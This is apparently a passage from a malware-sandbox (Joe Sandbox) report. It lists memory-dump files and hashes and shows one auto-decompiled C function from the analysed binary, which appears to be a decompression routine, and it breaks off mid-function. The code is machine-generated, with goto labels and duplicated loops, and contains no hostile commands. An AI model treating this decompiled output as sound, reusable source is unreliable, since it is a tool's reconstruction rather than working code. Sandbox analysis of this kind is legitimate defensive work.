                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 0bfd2ca6599221a0d7e9cd6960bc924a7bbbfb483dcb65b72c0dccd1466de071
                • Instruction ID: 0557bd4c3c2cde542559e63147d81adb75796a2cbcf8ebd2fe05edddac3d023d
                • Opcode Fuzzy Hash: 0bfd2ca6599221a0d7e9cd6960bc924a7bbbfb483dcb65b72c0dccd1466de071
                • Instruction Fuzzy Hash: 32A02230202200CFC380CF30AF0E30C3FECAE0A2C2308003BA008C8030EB3080A0AB08
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E003E62CA(intOrPtr __esi) {
                				signed int _t344;
                				signed int _t345;
                				signed int _t346;
                				signed int _t348;
                				signed int _t349;
                				signed int _t350;
                				signed int _t351;
                				signed int _t352;
                				signed int _t353;
                				signed int _t355;
                				signed int _t356;
                				signed int _t357;
                				void* _t359;
                				signed int _t361;
                				intOrPtr _t363;
                				signed int _t372;
                				char _t381;
                				void* _t385;
                				signed int _t386;
                				signed int _t387;
                				intOrPtr _t389;
                				signed int _t399;
                				char _t408;
                				unsigned int _t409;
                				void* _t417;
                				signed int _t418;
                				signed int _t419;
                				intOrPtr _t421;
                				signed int _t424;
                				char _t433;
                				signed int _t436;
                				signed int _t438;
                				signed int _t441;
                				signed int _t442;
                				signed int _t443;
                				signed int _t444;
                				signed int _t447;
                				signed int _t448;
                				signed short _t449;
                				signed int _t450;
                				signed int _t454;
                				unsigned int _t459;
                				signed int _t463;
                				signed int _t464;
                				signed int _t465;
                				signed int _t468;
                				signed int _t469;
                				signed short _t470;
                				unsigned int _t475;
                				signed int _t480;
                				unsigned int _t482;
                				signed int _t496;
                				signed int _t499;
                				signed int _t501;
                				signed int _t504;
                				signed int _t506;
                				signed int _t508;
                				signed int _t510;
                				intOrPtr* _t512;
                				intOrPtr* _t513;
                				signed int _t514;
                				intOrPtr* _t515;
                				signed int _t516;
                				signed int _t522;
                				signed int _t524;
                				signed int* _t525;
                				intOrPtr _t526;
                				void* _t529;
                				signed int _t532;
                				signed int* _t535;
                				unsigned int _t538;
                				signed int _t539;
                				void* _t540;
                				signed int _t543;
                				signed int _t545;
                				signed int _t548;
                				signed int _t551;
                				signed int _t554;
                				void* _t556;
                				signed int _t559;
                				signed int _t560;
                				intOrPtr* _t562;
                				void* _t563;
                				signed int _t565;
                				signed int _t568;
                				unsigned int _t575;
                				signed int _t576;
                				void* _t577;
                				signed int _t580;
                				void* _t583;
                				signed int _t586;
                				signed int _t589;
                				signed int _t591;
                				void* _t593;
                				signed int _t596;
                				intOrPtr* _t598;
                				void* _t599;
                				signed int _t602;
                				void* _t605;
                				signed int _t609;
                				signed int _t610;
                				intOrPtr* _t612;
                				void* _t613;
                				void* _t616;
                				signed int _t619;
                				intOrPtr* _t625;
                				void* _t626;
                				unsigned int _t633;
                				signed int _t636;
                				signed int _t637;
                				unsigned int _t639;
                				signed int _t642;
                				void* _t645;
                				signed int _t646;
                				void* _t649;
                				signed int _t650;
                				signed int _t651;
                				void* _t654;
                				unsigned int _t656;
                				unsigned int _t660;
                				signed int _t663;
                				signed int _t665;
                				unsigned int _t666;
                				signed int _t668;
                				signed int _t669;
                				signed int _t670;
                				signed int _t671;
                				signed short _t672;
                				signed int _t673;
                				signed int _t674;
                				unsigned int _t678;
                				signed int _t680;
                				intOrPtr _t684;
                				signed int _t686;
                				signed int _t687;
                				signed int _t688;
                				signed int* _t689;
                				char* _t692;
                				char* _t693;
                				signed int _t696;
                				void* _t697;
                				void* _t700;
                
                				L0:
                				while(1) {
                					L0:
                					_t684 = __esi;
                					_t525 = __esi + 0x7c;
                					while(1) {
                						L1:
                						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
                						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
                							goto L11;
                						} else {
                							_t513 = _t684 + 0x8c;
                							goto L3;
                						}
                						while(1) {
                							L3:
                							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
                							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
                								break;
                							}
                							L6:
                							if( *((char*)(_t684 + 0x9c)) != 0) {
                								L97:
                								_t360 = E003E5202(_t684);
                								L98:
                								return _t360;
                							}
                							L7:
                							_push(_t513);
                							_push(_t689);
                							_t360 = E003E3E0B(_t684);
                							if(_t360 == 0) {
                								goto L98;
                							}
                							L8:
                							_push(_t684 + 0xa0);
                							_push(_t513);
                							_push(_t689);
                							_t360 = E003E43BF(_t684);
                							if(_t360 != 0) {
                								continue;
                							} else {
                								goto L98;
                							}
                						}
                						L10:
                						_t496 = E003E4E52(_t684);
                						__eflags = _t496;
                						if(_t496 == 0) {
                							goto L97;
                						}
                						L11:
                						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
                						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
                						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
                							L17:
                							_t344 = E003DA89D(_t689);
                							_t345 =  *(_t684 + 0x124);
                							_t633 = _t344 & 0x0000fffe;
                							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
                							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
                								L19:
                								_t671 = 0xf;
                								_t346 = _t345 + 1;
                								__eflags = _t346 - _t671;
                								if(_t346 >= _t671) {
                									L25:
                									_t499 = _t689[1] + _t671;
                									_t348 = _t499 >> 3;
                									 *_t689 =  *_t689 + _t348;
                									 *(_t697 + 0x10) =  *_t689;
                									_t689[1] = _t499 & 0x00000007;
                									_t529 = 0x10;
                									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
                									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
                									asm("sbb eax, eax");
                									_t349 = _t348 & _t532;
                									__eflags = _t349;
                									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
                									_t350 =  *(_t697 + 0x10);
                									goto L26;
                								} else {
                									_t625 = _t684 + (_t346 + 0x29) * 4;
                									while(1) {
                										L21:
                										__eflags = _t633 -  *_t625;
                										if(_t633 <  *_t625) {
                											_t671 = _t346;
                											goto L25;
                										}
                										L22:
                										_t346 = _t346 + 1;
                										_t625 = _t625 + 4;
                										__eflags = _t346 - 0xf;
                										if(_t346 < 0xf) {
                											continue;
                										} else {
                											goto L25;
                										}
                									}
                									goto L25;
                								}
                							} else {
                								_t626 = 0x10;
                								_t670 = _t633 >> _t626 - _t345;
                								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
                								 *_t689 =  *_t689 + (_t508 >> 3);
                								_t504 = _t508 & 0x00000007;
                								_t350 =  *_t689;
                								_t689[1] = _t504;
                								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
                								 *(_t697 + 0x10) = _t350;
                								L26:
                								_t636 = _t672 & 0x0000ffff;
                								__eflags = _t636 - 0x100;
                								if(_t636 >= 0x100) {
                									L30:
                									__eflags = _t636 - 0x106;
                									if(_t636 < 0x106) {
                										L94:
                										__eflags = _t636 - 0x100;
                										if(_t636 != 0x100) {
                											L100:
                											__eflags = _t636 - 0x101;
                											if(_t636 != 0x101) {
                												L125:
                												_t637 = _t636 + 0xfffffefe;
                												__eflags = _t637;
                												_t535 = _t684 + (_t637 + 0x18) * 4;
                												_t501 =  *_t535;
                												 *(_t697 + 0x18) = _t501;
                												if(_t637 == 0) {
                													L127:
                													 *(_t684 + 0x60) = _t501;
                													_t351 = E003DA89D(_t689);
                													_t352 =  *(_t684 + 0x2de8);
                													_t639 = _t351 & 0x0000fffe;
                													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
                													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
                														L129:
                														_t673 = 0xf;
                														_t353 = _t352 + 1;
                														__eflags = _t353 - _t673;
                														if(_t353 >= _t673) {
                															L135:
                															_t538 = _t689[1] + _t673;
                															_t539 = _t538 & 0x00000007;
                															_t689[1] = _t539;
                															_t355 = _t538 >> 3;
                															 *_t689 =  *_t689 + _t355;
                															 *(_t697 + 0x20) = _t539;
                															_t540 = 0x10;
                															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
                															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
                															asm("sbb eax, eax");
                															_t356 = _t355 & _t543;
                															__eflags = _t356;
                															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
                															L136:
                															_t674 = _t357 & 0x0000ffff;
                															__eflags = _t674 - 8;
                															if(_t674 >= 8) {
                																_t504 = (_t674 >> 2) - 1;
                																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
                																__eflags = _t504;
                																if(_t504 != 0) {
                																	_t409 = E003DA89D(_t689);
                																	_t556 = 0x10;
                																	_t678 = _t678 + (_t409 >> _t556 - _t504);
                																	_t559 =  *(_t697 + 0x20) + _t504;
                																	 *_t689 =  *_t689 + (_t559 >> 3);
                																	_t560 = _t559 & 0x00000007;
                																	__eflags = _t560;
                																	_t689[1] = _t560;
                																}
                															} else {
                																_t678 = _t674 + 2;
                															}
                															__eflags =  *((char*)(_t684 + 0x4c44));
                															_t545 =  *(_t697 + 0x18);
                															 *(_t684 + 0x74) = _t678;
                															if( *((char*)(_t684 + 0x4c44)) == 0) {
                																L142:
                																_t642 =  *(_t684 + 0x7c);
                																_t506 = _t642 - _t545;
                																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
                																__eflags = _t506 - _t359;
                																if(_t506 >= _t359) {
                																	goto L152;
                																}
                																L143:
                																__eflags = _t642 - _t359;
                																if(_t642 >= _t359) {
                																	goto L152;
                																}
                																L144:
                																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
                																_t512 = _t506 + _t363;
                																_t692 = _t642 + _t363;
                																_t645 = 8;
                																 *(_t684 + 0x7c) = _t642 + _t678;
                																__eflags = _t678 - _t645;
                																if(_t678 < _t645) {
                																	L114:
                																	_t525 = _t684 + 0x7c;
                																	__eflags = _t678;
                																	if(_t678 == 0) {
                																		L89:
                																		_t689 = _t684 + 4;
                																		continue;
                																	}
                																	L115:
                																	_t525 = _t684 + 0x7c;
                																	 *_t692 =  *_t512;
                																	__eflags = _t678 - 1;
                																	if(_t678 <= 1) {
                																		goto L89;
                																	}
                																	L116:
                																	_t525 = _t684 + 0x7c;
                																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
                																	__eflags = _t678 - 2;
                																	if(_t678 <= 2) {
                																		goto L89;
                																	}
                																	L117:
                																	_t525 = _t684 + 0x7c;
                																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
                																	__eflags = _t678 - 3;
                																	if(_t678 <= 3) {
                																		goto L89;
                																	}
                																	L118:
                																	_t525 = _t684 + 0x7c;
                																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
                																	__eflags = _t678 - 4;
                																	if(_t678 <= 4) {
                																		goto L89;
                																	}
                																	L119:
                																	_t525 = _t684 + 0x7c;
                																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
                																	__eflags = _t678 - 5;
                																	if(_t678 <= 5) {
                																		goto L89;
                																	}
                																	L120:
                																	_t525 = _t684 + 0x7c;
                																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
                																	__eflags = _t678 - 6;
                																	if(_t678 <= 6) {
                																		goto L89;
                																	}
                																	L121:
                																	_t360 =  *((intOrPtr*)(_t512 + 6));
                																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
                																	goto L155;
                																}
                																L145:
                																__eflags = _t545 - _t678;
                																if(_t545 >= _t678) {
                																	L149:
                																	_t372 = _t678 >> 3;
                																	__eflags = _t372;
                																	 *(_t697 + 0x20) = _t372;
                																	_t686 = _t372;
                																	do {
                																		L150:
                																		E003F0320(_t692, _t512, _t645);
                																		_t697 = _t697 + 0xc;
                																		_t645 = 8;
                																		_t512 = _t512 + _t645;
                																		_t692 = _t692 + _t645;
                																		_t678 = _t678 - _t645;
                																		_t686 = _t686 - 1;
                																		__eflags = _t686;
                																	} while (_t686 != 0);
                																	L113:
                																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
                																	goto L114;
                																}
                																L146:
                																_t548 = _t678 >> 3;
                																__eflags = _t548;
                																do {
                																	L147:
                																	_t678 = _t678 - _t645;
                																	 *_t692 =  *_t512;
                																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
                																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
                																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
                																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
                																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
                																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
                																	_t381 =  *((intOrPtr*)(_t512 + 7));
                																	_t512 = _t512 + _t645;
                																	 *((char*)(_t692 + 7)) = _t381;
                																	_t692 = _t692 + _t645;
                																	_t548 = _t548 - 1;
                																	__eflags = _t548;
                																} while (_t548 != 0);
                																goto L114;
                															} else {
                																L141:
                																_push( *(_t684 + 0xe6dc));
                																_push(_t684 + 0x7c);
                																_push(_t545);
                																L70:
                																_push(_t678);
                																E003E2C30();
                																while(1) {
                																	L0:
                																	_t684 = __esi;
                																	_t525 = __esi + 0x7c;
                																	do {
                																		do {
                																			goto L3;
                																			L152:
                																			_t525 = _t684 + 0x7c;
                																			__eflags = _t678;
                																		} while (_t678 == 0);
                																		_t360 =  *(_t684 + 0xe6dc);
                																		do {
                																			L154:
                																			_t361 = _t360 & _t506;
                																			_t506 = _t506 + 1;
                																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
                																			_t360 =  *(_t684 + 0xe6dc);
                																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
                																			 *(_t684 + 0x7c) = _t642;
                																			_t678 = _t678 - 1;
                																			__eflags = _t678;
                																		} while (_t678 != 0);
                																		L155:
                																		goto L0;
                																		do {
                																			while(1) {
                																				L0:
                																				_t684 = __esi;
                																				_t525 = __esi + 0x7c;
                																				L1:
                																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
                																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
                																					goto L11;
                																				} else {
                																					_t513 = _t684 + 0x8c;
                																					goto L3;
                																				}
                																			}
                																			L96:
                																			_t438 = E003E253E(_t684, _t697 + 0x28);
                																			__eflags = _t438;
                																		} while (_t438 != 0);
                																		goto L97;
                																		L90:
                																		_t525 = _t684 + 0x7c;
                																		__eflags = _t678;
                																	} while (_t678 == 0);
                																	_t386 =  *(_t684 + 0xe6dc);
                																	_t514 =  *(_t697 + 0x20);
                																	do {
                																		L92:
                																		_t387 = _t386 & _t514;
                																		_t514 = _t514 + 1;
                																		 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t387 +  *((intOrPtr*)(_t684 + 0x4b40))));
                																		_t386 =  *(_t684 + 0xe6dc);
                																		_t646 =  *(_t684 + 0x7c) + 0x00000001 & _t386;
                																		 *(_t684 + 0x7c) = _t646;
                																		_t678 = _t678 - 1;
                																		__eflags = _t678;
                																	} while (_t678 != 0);
                																	goto L155;
                																}
                															}
                														}
                														L130:
                														_t562 = _t684 + (_t353 + 0xb5a) * 4;
                														while(1) {
                															L131:
                															__eflags = _t639 -  *_t562;
                															if(_t639 <  *_t562) {
                																break;
                															}
                															L132:
                															_t353 = _t353 + 1;
                															_t562 = _t562 + 4;
                															__eflags = _t353 - 0xf;
                															if(_t353 < 0xf) {
                																continue;
                															}
                															L133:
                															goto L135;
                														}
                														L134:
                														_t673 = _t353;
                														goto L135;
                													}
                													L128:
                													_t563 = 0x10;
                													_t650 = _t639 >> _t563 - _t352;
                													_t524 = ( *(_t650 + _t684 + 0x2dec) & 0x000000ff) + _t689[1];
                													 *_t689 =  *_t689 + (_t524 >> 3);
                													_t504 = _t524 & 0x00000007;
                													_t689[1] = _t504;
                													_t357 =  *(_t684 + 0x31ec + _t650 * 2) & 0x0000ffff;
                													 *(_t697 + 0x20) = _t504;
                													goto L136;
                												} else {
                													goto L126;
                												}
                												do {
                													L126:
                													 *_t535 =  *(_t535 - 4);
                													_t535 = _t535 - 4;
                													_t637 = _t637 - 1;
                													__eflags = _t637;
                												} while (_t637 != 0);
                												goto L127;
                											}
                											L101:
                											_t678 =  *(_t684 + 0x74);
                											__eflags = _t678;
                											if(_t678 == 0) {
                												while(1) {
                													L0:
                													_t684 = __esi;
                													_t525 = __esi + 0x7c;
                													goto L1;
                												}
                											}
                											L102:
                											__eflags =  *((char*)(_t684 + 0x4c44));
                											if( *((char*)(_t684 + 0x4c44)) == 0) {
                												L104:
                												_t651 =  *(_t684 + 0x7c);
                												_t565 =  *(_t684 + 0x60);
                												_t417 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
                												_t510 = _t651 - _t565;
                												__eflags = _t510 - _t417;
                												if(_t510 >= _t417) {
                													L122:
                													_t418 =  *(_t684 + 0xe6dc);
                													do {
                														L123:
                														_t419 = _t418 & _t510;
                														_t510 = _t510 + 1;
                														 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t651)) =  *((intOrPtr*)(_t419 +  *((intOrPtr*)(_t684 + 0x4b40))));
                														_t418 =  *(_t684 + 0xe6dc);
                														_t651 =  *(_t684 + 0x7c) + 0x00000001 & _t418;
                														 *(_t684 + 0x7c) = _t651;
                														_t678 = _t678 - 1;
                														__eflags = _t678;
                													} while (_t678 != 0);
                													goto L155;
                												}
                												L105:
                												__eflags = _t651 - _t417;
                												if(_t651 >= _t417) {
                													goto L122;
                												}
                												L106:
                												_t421 =  *((intOrPtr*)(_t684 + 0x4b40));
                												_t512 = _t510 + _t421;
                												_t692 = _t651 + _t421;
                												_t654 = 8;
                												 *(_t684 + 0x7c) = _t651 + _t678;
                												__eflags = _t678 - _t654;
                												if(_t678 < _t654) {
                													goto L114;
                												}
                												L107:
                												__eflags = _t565 - _t678;
                												if(_t565 >= _t678) {
                													L111:
                													_t424 = _t678 >> 3;
                													__eflags = _t424;
                													 *(_t697 + 0x20) = _t424;
                													_t688 = _t424;
                													do {
                														L112:
                														E003F0320(_t692, _t512, _t654);
                														_t697 = _t697 + 0xc;
                														_t654 = 8;
                														_t512 = _t512 + _t654;
                														_t692 = _t692 + _t654;
                														_t678 = _t678 - _t654;
                														_t688 = _t688 - 1;
                														__eflags = _t688;
                													} while (_t688 != 0);
                													goto L113;
                												}
                												L108:
                												_t568 = _t678 >> 3;
                												__eflags = _t568;
                												do {
                													L109:
                													_t678 = _t678 - _t654;
                													 *_t692 =  *_t512;
                													 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
                													 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
                													 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
                													 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
                													 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
                													 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
                													_t433 =  *((intOrPtr*)(_t512 + 7));
                													_t512 = _t512 + _t654;
                													 *((char*)(_t692 + 7)) = _t433;
                													_t692 = _t692 + _t654;
                													_t568 = _t568 - 1;
                													__eflags = _t568;
                												} while (_t568 != 0);
                												goto L114;
                											}
                											L103:
                											_push( *(_t684 + 0xe6dc));
                											_push(_t684 + 0x7c);
                											_push( *(_t684 + 0x60));
                											goto L70;
                										}
                										L95:
                										_push(_t697 + 0x28);
                										_t436 = E003E3F9D(_t684, _t689);
                										__eflags = _t436;
                										if(_t436 == 0) {
                											goto L97;
                										}
                										goto L96;
                									}
                									L31:
                									_t680 = _t636 - 0x106;
                									__eflags = _t680 - 8;
                									if(_t680 >= 8) {
                										_t441 = (_t680 >> 2) - 1;
                										 *(_t697 + 0x20) = _t441;
                										_t678 = ((_t680 & 0x00000003 | 0x00000004) << _t441) + 2;
                										__eflags = _t441;
                										if(_t441 != 0) {
                											_t482 = E003DA89D(_t689);
                											_t522 = _t504 +  *(_t697 + 0x20);
                											_t616 = 0x10;
                											_t678 = _t678 + (_t482 >> _t616 -  *(_t697 + 0x20));
                											_t619 =  *(_t697 + 0x10) + (_t522 >> 3);
                											_t504 = _t522 & 0x00000007;
                											__eflags = _t504;
                											 *(_t697 + 0x10) = _t619;
                											 *_t689 = _t619;
                											_t689[1] = _t504;
                										}
                									} else {
                										 *(_t697 + 0x10) = _t350;
                										_t678 = _t680 + 2;
                									}
                									_t442 = E003DA89D(_t689);
                									_t443 =  *(_t684 + 0x1010);
                									_t656 = _t442 & 0x0000fffe;
                									__eflags = _t656 -  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4));
                									if(_t656 >=  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4))) {
                										L37:
                										_t516 = 0xf;
                										_t444 = _t443 + 1;
                										__eflags = _t444 - _t516;
                										if(_t444 >= _t516) {
                											L43:
                											_t575 = _t689[1] + _t516;
                											_t576 = _t575 & 0x00000007;
                											_t689[1] = _t576;
                											 *_t689 =  *_t689 + (_t575 >> 3);
                											_t447 =  *_t689;
                											 *(_t697 + 0x10) = _t576;
                											_t577 = 0x10;
                											 *(_t697 + 0x14) = _t447;
                											_t580 =  *((intOrPtr*)(_t684 + 0xfd0 + _t516 * 4)) + (_t656 -  *((intOrPtr*)(_t684 + 0xf8c + _t516 * 4)) >> _t577 - _t516);
                											__eflags = _t580 -  *((intOrPtr*)(_t684 + 0xf8c));
                											asm("sbb eax, eax");
                											_t448 = _t447 & _t580;
                											__eflags = _t448;
                											_t449 =  *(_t684 + 0x1c14 + _t448 * 2) & 0x0000ffff;
                											goto L44;
                										}
                										L38:
                										_t612 = _t684 + (_t444 + 0x3e4) * 4;
                										while(1) {
                											L39:
                											__eflags = _t656 -  *_t612;
                											if(_t656 <  *_t612) {
                												break;
                											}
                											L40:
                											_t444 = _t444 + 1;
                											_t612 = _t612 + 4;
                											__eflags = _t444 - 0xf;
                											if(_t444 < 0xf) {
                												continue;
                											}
                											L41:
                											goto L43;
                										}
                										L42:
                										_t516 = _t444;
                										goto L43;
                									} else {
                										L36:
                										_t613 = 0x10;
                										_t666 = _t656 >> _t613 - _t443;
                										 *(_t697 + 0x20) = _t666;
                										_t668 = ( *(_t666 + _t684 + 0x1014) & 0x000000ff) + _t504;
                										_t480 = (_t668 >> 3) +  *(_t697 + 0x10);
                										_t669 = _t668 & 0x00000007;
                										 *(_t697 + 0x14) = _t480;
                										 *_t689 = _t480;
                										_t689[1] = _t669;
                										 *(_t697 + 0x10) = _t669;
                										_t449 =  *(_t684 + 0x1414 +  *(_t697 + 0x20) * 2) & 0x0000ffff;
                										L44:
                										_t450 = _t449 & 0x0000ffff;
                										__eflags = _t450 - 4;
                										if(_t450 >= 4) {
                											L46:
                											_t696 = (_t450 >> 1) - 1;
                											_t454 = ((_t450 & 0x00000001 | 0x00000002) << _t696) + 1;
                											 *(_t697 + 0x20) = _t454;
                											_t504 = _t454;
                											 *(_t697 + 0x18) = _t504;
                											__eflags = _t696;
                											if(_t696 == 0) {
                												L63:
                												_t689 = _t684 + 4;
                												L64:
                												__eflags = _t504 - 0x100;
                												if(_t504 > 0x100) {
                													_t678 = _t678 + 1;
                													__eflags = _t504 - 0x2000;
                													if(_t504 > 0x2000) {
                														_t678 = _t678 + 1;
                														__eflags = _t504 - 0x40000;
                														if(_t504 > 0x40000) {
                															_t678 = _t678 + 1;
                															__eflags = _t678;
                														}
                													}
                												}
                												 *(_t684 + 0x6c) =  *(_t684 + 0x68);
                												 *(_t684 + 0x68) =  *(_t684 + 0x64);
                												 *(_t684 + 0x64) =  *(_t684 + 0x60);
                												 *(_t684 + 0x60) = _t504;
                												__eflags =  *((char*)(_t684 + 0x4c44));
                												 *(_t684 + 0x74) = _t678;
                												if( *((char*)(_t684 + 0x4c44)) == 0) {
                													L71:
                													_t646 =  *(_t684 + 0x7c);
                													_t551 = _t646 - _t504;
                													_t385 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
                													 *(_t697 + 0x20) = _t551;
                													__eflags = _t551 - _t385;
                													if(_t551 >= _t385) {
                														goto L90;
                													}
                													L72:
                													__eflags = _t646 - _t385;
                													if(_t646 >= _t385) {
                														goto L90;
                													}
                													L73:
                													_t389 =  *((intOrPtr*)(_t684 + 0x4b40));
                													_t515 = _t389 + _t551;
                													_t693 = _t646 + _t389;
                													_t649 = 8;
                													_t525 = _t684 + 0x7c;
                													 *_t525 = _t646 + _t678;
                													__eflags = _t678 - _t649;
                													if(_t678 < _t649) {
                														L81:
                														__eflags = _t678;
                														if(_t678 != 0) {
                															 *_t693 =  *_t515;
                															__eflags = _t678 - 1;
                															if(_t678 > 1) {
                																 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
                																__eflags = _t678 - 2;
                																if(_t678 > 2) {
                																	 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
                																	__eflags = _t678 - 3;
                																	if(_t678 > 3) {
                																		 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
                																		__eflags = _t678 - 4;
                																		if(_t678 > 4) {
                																			 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
                																			__eflags = _t678 - 5;
                																			if(_t678 > 5) {
                																				 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
                																				__eflags = _t678 - 6;
                																				if(_t678 > 6) {
                																					 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
                																				}
                																			}
                																		}
                																	}
                																}
                															}
                														}
                														goto L89;
                													}
                													L74:
                													__eflags =  *(_t697 + 0x18) - _t678;
                													if( *(_t697 + 0x18) >= _t678) {
                														L78:
                														_t399 = _t678 >> 3;
                														__eflags = _t399;
                														 *(_t697 + 0x20) = _t399;
                														_t687 = _t399;
                														do {
                															L79:
                															E003F0320(_t693, _t515, _t649);
                															_t697 = _t697 + 0xc;
                															_t649 = 8;
                															_t515 = _t515 + _t649;
                															_t693 = _t693 + _t649;
                															_t678 = _t678 - _t649;
                															_t687 = _t687 - 1;
                															__eflags = _t687;
                														} while (_t687 != 0);
                														_t684 =  *((intOrPtr*)(_t697 + 0x1c));
                														_t525 =  *(_t697 + 0x24);
                														goto L81;
                													}
                													L75:
                													_t554 = _t678 >> 3;
                													__eflags = _t554;
                													do {
                														L76:
                														_t678 = _t678 - _t649;
                														 *_t693 =  *_t515;
                														 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
                														 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
                														 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
                														 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
                														 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
                														 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
                														_t408 =  *((intOrPtr*)(_t515 + 7));
                														_t515 = _t515 + _t649;
                														 *((char*)(_t693 + 7)) = _t408;
                														_t693 = _t693 + _t649;
                														_t554 = _t554 - 1;
                														__eflags = _t554;
                													} while (_t554 != 0);
                													_t525 = _t684 + 0x7c;
                													goto L81;
                												} else {
                													L69:
                													_push( *(_t684 + 0xe6dc));
                													_push(_t684 + 0x7c);
                													_push(_t504);
                													goto L70;
                												}
                											}
                											L47:
                											__eflags = _t696 - 4;
                											if(__eflags < 0) {
                												L62:
                												_t459 = E003E8934(_t684 + 4);
                												_t583 = 0x20;
                												_t504 = (_t459 >> _t583 - _t696) +  *(_t697 + 0x20);
                												_t586 =  *(_t697 + 0x10) + _t696;
                												 *(_t697 + 0x18) = _t504;
                												_t689 = _t684 + 4;
                												 *_t689 = (_t586 >> 3) +  *(_t697 + 0x14);
                												_t689[1] = _t586 & 0x00000007;
                												goto L64;
                											}
                											L48:
                											if(__eflags <= 0) {
                												_t689 = _t684 + 4;
                											} else {
                												_t475 = E003E8934(_t684 + 4);
                												_t605 = 0x24;
